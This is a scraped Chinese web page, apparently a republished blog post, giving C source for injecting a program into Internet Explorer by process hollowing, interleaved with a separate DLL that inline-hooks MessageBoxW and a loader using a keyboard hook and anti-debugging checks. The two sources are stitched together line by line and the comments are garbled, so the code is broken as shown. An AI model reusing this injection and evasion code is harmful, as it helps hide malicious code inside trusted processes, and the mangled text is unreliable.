把自身插入到IE进程里的代码

作者: 计算机网络  发布:2019-11-14

#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"ntdll.lib")

说明

typedef long NTSTATUS;

该函数通过音信hook注入dll到目标程序,之后通过inline hook 了messageboxw函数的头补个字节来达成MessageBox的HOOK

NTSYSAPI
NTSTATUS
NTAPI
ZwUnmapViewOfSection(
      HANDLE ProcessHandle,
      PVOID BaseAddress
      );

代码1是dll内容,代码2是hook程序

typedef struct _ChildProcessInfo
{
DWORD dwBaseAddress;
DWORD dwReserve;
} CHILDPROCESS;

图片 1

char szIePath[MAX_PATH];

源码

BOOL FindIePath(char *IePath,int *dwBuffSize);
BOOL InjectProcess(void);
DWORD GetSelfImageSize(HMODULE hModule);

#include

BOOL CreateInjectProcess(
       PPROCESS_INFORMATION pi,
       PCONTEXT pThreadCxt,
       CHILDPROCESS *pChildProcess
       );

#include

int main(void)
{
if (InjectProcess() )
{
   printf("This is my a test code,made by shadow3.rn");
}
else
{
   MessageBox(NULL,"进程插入实现","Text",MB_OK);
}

HWND hwnd = NULL;

return 0;
}

DWORD dwPid = 0;

BOOL FindIePath(char *IePath,int *dwBuffSize)
{
char szSystemDir[MAX_PATH];

void HookOff();

GetSystemDirectory(szSystemDir,MAX_PATH);

void HookOn();

szSystemDir[2] = '';
   lstrcat(szSystemDir,"\ProgramFiles\Internet Explorer\iexplore.exe");

VOID InlineHook();

lstrcpy(IePath, szSystemDir);
return TRUE;
}

typedef int (WINAPI* MBW)(HWND hWnd, LPCWSTR lpText, LPCWSTR lpCaption, UINT uType);

BOOL InjectProcess(void)
{
char szModulePath[MAX_PATH];
DWORD dwImageSize = 0;

MBW OldMsgBoxW = NULL;//指向原函数的指针

STARTUPINFO si = {0};
PROCESS_INFORMATION pi;
CONTEXT ThreadCxt;
DWORD *PPEB;
DWORD dwWrite = 0;
CHILDPROCESS stChildProcess;
LPVOID lpVirtual = NULL;
PIMAGE_DOS_HEADER pDosheader = NULL;
PIMAGE_NT_HEADERS pVirPeHead = NULL;

FARPROC pfOldMsgBoxW;//指向函数的远指针

HMODULE hModule = NULL;

BYTE OldCode[5];//原API入口

ZeroMemory(szModulePath,MAX_PATH);
ZeroMemory(szIePath,MAX_PATH);

BYTE NewCode[5];//新API的入口代码(jmp xxxxxxxx)

GetModuleFileName(NULL,szModulePath,MAX_PATH);
FindIePath(szIePath,NULL);

HANDLE hProcess = NULL;//本程序进程句柄

if ( lstrcmpiA(szIePath,szModulePath) == 0 )
{
   return FALSE;
}

HINSTANCE hInst = NULL;//API所在的dll文件句柄

hModule = GetModuleHandle(NULL);
if ( hModule == NULL )
{
   return FALSE;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD fdwReason, LPVOID lpvReserved){

pDosheader = (PIMAGE_DOS_HEADER)hModule;
pVirPeHead = (PIMAGE_NT_HEADERS)((DWORD)hModule + pDosheader->e_lfanew);

switch (fdwReason){

dwImageSize = GetSelfImageSize(hModule);

case DLL_PROCESS_ATTACH://进度加载DLL

if ( CreateInjectProcess(&pi, &ThreadCxt ,&stChildProcess) )
{
   printf("CHILD PID: [%d]rn",pi.dwProcessId);
 
 
   if ( ZwUnmapViewOfSection(
    pi.hProcess,
    (LPVOID)stChildProcess.dwBaseAddress
    ) == 0 )
   {
    lpVirtual = VirtualAllocEx(
     pi.hProcess,
     (LPVOID)hModule,
     dwImageSize,
     MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE
     );
  
    if ( lpVirtual )
    {
     printf("Unmapped and Allocated Mem Success.rn");
    }
  
   }
   else
   {
    printf("ZwUnmapViewOfSection() failed.rn");
    return TRUE;
   }
 
   if ( lpVirtual )
   {
    PPEB = (DWORD *)ThreadCxt.Ebx;
  
    // 重写装载地方
  
    WriteProcessMemory(
     pi.hProcess,
     &PPEB[2],
     &lpVirtual,
     sizeof(DWORD),
     &dwWrite
     );
  
  
    if ( WriteProcessMemory(
     pi.hProcess,
     lpVirtual,
     hModule,
     dwImageSize,
     &dwWrite) )
    {
     printf("image inject into process success.rn");
   
     ThreadCxt.ContextFlags = CONTEXT_FULL;
     if ( (DWORD)lpVirtual == stChildProcess.dwBaseAddress )
     {
      ThreadCxt.Eax = (DWORD)pVirPeHead->OptionalHeader.ImageBase + pVirPeHead->OptionalHeader.AddressOfEntryPoint;
     }
     else
     {
      ThreadCxt.Eax = (DWORD)lpVirtual + pVirPeHead->OptionalHeader.AddressOfEntryPoint;
     }

{

#ifdef DEBUG
     printf("EAX = [0x%08x]rn",ThreadCxt.Eax);
     printf("EBX = [0x%08x]rn",ThreadCxt.Ebx);
     printf("ECX = [0x%08x]rn",ThreadCxt.Ecx);
     printf("EDX = [0x%08x]rn",ThreadCxt.Edx);
     printf("EIP = [0x%08x]rn",ThreadCxt.Eip);
#endif
   
     SetThreadContext(pi.hThread, &ThreadCxt);
     ResumeThread(pi.hThread);
   
    }
    else
    {
     printf("WirteMemory Failed,code:%drn",GetLastError());
     TerminateProcess(pi.hProcess, 0);
    }
  
   }
   else
   {
    printf("VirtualMemory Failed,code:%drn",GetLastError());
    TerminateProcess(pi.hProcess, 0);
   }
}

DWORD dwPid = GetCurrentProcessId();

return TRUE;
}

hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, dwPid);

DWORD GetSelfImageSize(HMODULE hModule)
{
DWORD dwImageSize;

InlineHook();

_asm
{
   mov ecx,0x30
    mov eax, fs:[ecx]
    mov eax, [eax + 0x0c]
    mov esi, [eax + 0x0c]
    add esi,0x20
    lodsd
    mov dwImageSize,eax
  
}

MessageBox(NULL, "DLL_PROCESS_ATTACH", "DLL HOOK", MB_OK);

return dwImageSize;
}

}

BOOL CreateInjectProcess(
       PPROCESS_INFORMATION pi,
       PCONTEXT pThreadCxt,
       CHILDPROCESS *pChildProcess
       )
     
{
STARTUPINFO si = {0};

break;

DWORD *PPEB;
DWORD read;

case DLL_THREAD_ATTACH://线程加载DLL

// 使用挂起情势运营ie

//MessageBox(NULL, "DLL_THREAD_ATTACH", "DLL HOOK", MB_OK);

if( CreateProcess(
   NULL,
   szIePath,
   NULL,
   NULL,
   0,
   CREATE_SUSPENDED,
   NULL,
   NULL,
   &si,
   pi
   ) )
{
   pThreadCxt->ContextFlags = CONTEXT_FULL;
   GetThreadContext(pi->hThread, pThreadCxt);
 
   PPEB = (DWORD *)pThreadCxt->Ebx;
 
   // 得到ie的装载营地址
   ReadProcessMemory(
    pi->hProcess,
    &PPEB[2],
    (LPVOID)&(pChildProcess->dwBaseAddress),
    sizeof(DWORD),
    &read
    );
 
   return TRUE ;
 
}

break;

return FALSE;
}

case DLL_THREAD_DETACH://线程卸载DLL

windows.h #include stdio.h #pragma comment(lib,ntdll.lib) typedef long NTSTATUS; NTSYSAPI NTSTATUS NTAPI ZwUnmapViewOfSection( HANDLE ProcessHandle, PVOID BaseAddress ); t...

//MessageBox(NULL, "DLL_THREAD_DETACH", "DLL HOOK", MB_OK);

break;

case DLL_PROCESS_DETACH://进度卸载DLL

HookOff();

MessageBox(NULL, "DLL_PROCESS_DETACH", "DLL HOOK", MB_OK);

break;

}

return TRUE;

}

//自己的MessageBox函数

int WINAPI MyMessageBoxW(HWND hWnd, LPCWSTR lpText, LPCWSTR lpCaption, UINT uType){

HookOff();

int nRet = MessageBoxW(hWnd, L"哈哈,MessageBoxW被HOOK了", lpCaption, uType);

HookOn();

return nRet;

}

//导出?大概不供给 最早inline hook

VOID InlineHook(){

//获取原API入口地址

HMODULE hmod = LoadLibrary(TEXT("User32.dll"));

OldMsgBoxW = (MBW)GetProcAddress(hmod, "MessageBoxW");

pfOldMsgBoxW = (FARPROC)OldMsgBoxW;

//出错判别

if (NULL == pfOldMsgBoxW){

MessageBox(NULL, TEXT("获取原API入口地址出错"), TEXT("error!"), 0);

return;

}

//asm获取前5个字节,复制到OldCode

__asm{

lea edi, OldCode//获取OldCode数组的地点,放到edi

mov esi, pfOldMsgBoxW//获取原API入口地址,放到esi

cld//方向标识位,为以下两条指令做酌量,从低地址到高地址

movsd//复制原API入口前4个字节到OldCode数组

movsb//复制原API进口第5个字节到OldCode数组

}

//这是打算跳转到大家函数的code

NewCode[0] = 0xe9;//jmp

__asm{

lea eax, MyMessageBoxW//获取大家的MyMessageBoxW函数地址 1000

mov ebx, pfOldMsgBoxW//原系统API函数地址 2002

sub eax, ebx//intnAddr= UserFunAddr ?SysFunAddr 这里收获相对地址?没看老子@楚

sub eax, 5//nAddr=nAddr-5

mov dword ptr[NewCode + 1], eax//将算出的地点nAddr保存到NewCode后边个字节

//注:多少个函数地址占5个字节

}

HookOn();

}

//开启钩子的函数

void HookOn(){

if (NULL == hProcess){

return;

}

DWORD dwTemp = 0;

DWORD dwOldProtect;

//校订API函数入口前个字节为jmp xxxxxx

VirtualProtectEx(hProcess, pfOldMsgBoxW, 5, PAGE_READWRITE, &dwOldProtect);

WriteProcessMemory(hProcess, pfOldMsgBoxW, NewCode, 5, 0);

VirtualProtectEx(hProcess, pfOldMsgBoxW, 5, dwOldProtect, &dwTemp);

}

//关闭钩子的函数

void HookOff(){

if (NULL == hProcess){

return;

}

DWORD dwTemp = 0;

DWORD dwOldProtect;

//复苏API函数入口前个字节

VirtualProtectEx(hProcess, pfOldMsgBoxW, 5, PAGE_READWRITE, &dwOldProtect);

WriteProcessMemory(hProcess, pfOldMsgBoxW, OldCode, 5, 0);

VirtualProtectEx(hProcess, pfOldMsgBoxW, 5, dwOldProtect, &dwTemp);

}

LRESULT WINAPI myproc(int code, WPARAM w, LPARAM l){

//只是利用钩子注入DLL到进程

return CallNextHookEx(myproc, code, w, l);

}

源码

#include

#include

typedef BOOL(_stdcall *LPAPI_IDP)(VOID);

int main(int argc, PCHAR argv[]){

HMODULE hModule = LoadLibrary("Kernel32");// 加载模块Kernel32

if (hModule == NULL)

{

printf("被调和,不或然拿到 kernel32.dll模块n");//ExitProcess(0); // 假设开掘前后相继被调治将养 直接退出进程

}

LPAPI_IDP IsDebuggerPresent = GetProcAddress(hModule, "IsDebuggerPresent");// 获取下地址

if (IsDebuggerPresent == NULL)

{

printf("被调理,不可能得到 IsDebuggerPresent 地址n");//ExitProcess(0); // 假使开掘前后相继被调弄收拾 直接退出进度

}

if (*(BYTE *)IsDebuggerPresent == 0xcc ||// 调用前检验下是不是被下了断点

*(BYTE *)IsDebuggerPresent != 0x64 ||

IsDebuggerPresent())// 调用

{

printf("被调试,下断点n");//ExitProcess(0); // 即使开采前后相继被调护医疗直接退出进度

}

LPSTR name;

__asm{

mov eax, fs:[0x18]//_NT_TIB

mov eax, [eax + 0x30]//_NT_TIB

mov eax, [eax + 0xc]//_PEB_LDR_DATA

mov eax, [eax + 0xc]//_LIST_ENTRY

mov eax, [eax + 0x30]

mov name, eax

}

wprintf(L"%sn", name);

BOOL ret = IsDebuggerPresent();

printf("IsDebuggerPresent = %dn", ret);

HHOOK kbhook;

HMODULE mydll = LoadLibrary("mydll.dll");

HMODULE myproc = GetProcAddress(mydll, "myproc");

kbhook = SetWindowsHookEx(WH_KEYBOARD, myproc, mydll, 0);

if (kbhook == NULL){

printf("SetWindowsHookEx failed %dn", GetLastError());

} else

{

printf("执行SetWindowsHookEx完成.n");

printf("额,不执行?n");

}

//BOOL crdp = CheckRemoteDebuggerPresent();

//音信循环

MSG msg;

while (GetMessage(&msg, NULL, 0, 0)){

TranslateMessage(&msg);

DispatchMessage(&msg);

};

UnhookWindowsHookEx(kbhook);

getchar();

return 0;

}

本文由金沙澳门官网送注册58发布于计算机网络,转载请注明出处:把自身插入到IE进程里的代码

关键词: